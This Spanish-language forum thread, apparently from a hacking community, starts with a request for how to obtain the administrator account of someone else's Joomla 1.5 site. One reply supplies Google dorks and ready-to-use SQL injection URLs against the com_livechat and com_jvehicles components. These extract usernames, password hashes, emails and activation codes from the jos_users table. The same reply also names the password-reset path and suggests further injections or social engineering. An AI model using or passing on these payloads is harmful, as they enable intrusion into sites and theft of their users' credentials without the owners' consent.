[SOLUCIONADO] Ayuda , Sacar admin de Joomla 1.5

Iniciado por WhitePag, Agosto 10, 2011, 02:20:29 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Agosto 10, 2011, 02:20:29 AM Ultima modificación: Febrero 09, 2015, 12:13:38 PM por Expermicid
Buenas , tengo una duda , como puedo hacer para sacar el admin de una pagina que tiene joomla 1.5? mediante sql o como?
si me pueden dejar un link o tuto mucho mejor
Muchas Gracias!
Agosto 10, 2011, 10:07:22 AM #1
 ??? La manera más facil es que se lo pidas al Administrador  ::) al menos que te tomes el tiempo de buscar en San Google o en el Foro algunos Manuales o VideoTutoriales, te recomiendo buscar los VideoTutoriales de Xt3mP.
El Lenguaje es la Ciudad para cuya Edificación cada Ser Humano ha Aportado una Piedra
Agosto 10, 2011, 01:00:42 PM #2
Primero aprende a usar el Google. Como dice el RandomSoft, hay muchos tutoriales sobre el tema, tan solo buscalos.

Agosto 11, 2011, 06:57:49 PM #3
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
depende men que bug tenga mira aqui te doy algo que te ayudaria

Código: php
Dork: allinurl:index.php?option=com_livechat

Exploit: /administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex%28hex%28concat%28username,0x3a,password%29%29%29,3%20from%20jos_users

Dork: allinurl:index.php?option=com_livechat

Exploit: /index.php?option=com_user&view=reset&layout=confirm



--------------------------------------------------------------------

Dorks : inurl:option=com_jvehicles inurl:com_jvehicles

######### Exploit nr 1 ############

index.php?option=com_jvehicles&task=agentlisting&aid=62 /**/ AND /**/ 1=0 /**/ UNION /**/ ALL /**/ SELECT /**/ 1, /**/ 2, /**/ version(), /**/ 4, /**/ group_concat(username,0x3a,email), /**/ 6, /**/ 7, /**/ 8, /**/ 9, /**/ 10, /**/ 11, /**/ 12, /**/ 13, /**/ 14, /**/ 15, /**/ 16, /**/ 17, /**/ 18, /**/ 19, /**/ 20, /**/ 21, /**/ 22, /**/ 23, /**/ 24, /**/ 25, /**/ 26, /**/ 27, /**/ 28, /**/ 29, /**/ 30, /**/ 31, /**/ 32 from+jos_users--

######## Exploit Nr 2 ############

index.php?option=com_jvehicles&task=agentlisting&aid=62 /**/ AND /**/ 1=0 /**/ UNION /**/ ALL /**/ SELECT /**/ 1, /**/ 2, /**/ version(), /**/ 4, /**/ group_concat(username,0x3a,activation), /**/ 6, /**/ 7, /**/ 8, /**/ 9, /**/ 10, /**/ 11, /**/ 12, /**/ 13, /**/ 14, /**/ 15, /**/ 16, /**/ 17, /**/ 18, /**/ 19, /**/ 20, /**/ 21, /**/ 22, /**/ 23, /**/ 24, /**/ 25, /**/ 26, /**/ 27, /**/ 28, /**/ 29, /**/ 30, /**/ 31, /**/ 32 from+jos_users--


/index.php?option=com_user&view=reset


No creo que le sirvan porque los dos estan basados en componentes especificos (com_livechat, com_jvehicles) y no en vulnerabilidades nativas (que son muy escazas por no decir cada ves mas imposibles de encontrar)

De todas maneras si es buena idea que busques los componentes instalados y trates inyecciones varias y tal... si no quizas puedas sacar el adm con ingenieria social.

=) saludos

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Imprimir
Ir Arriba Páginas1
Acciones del Usuario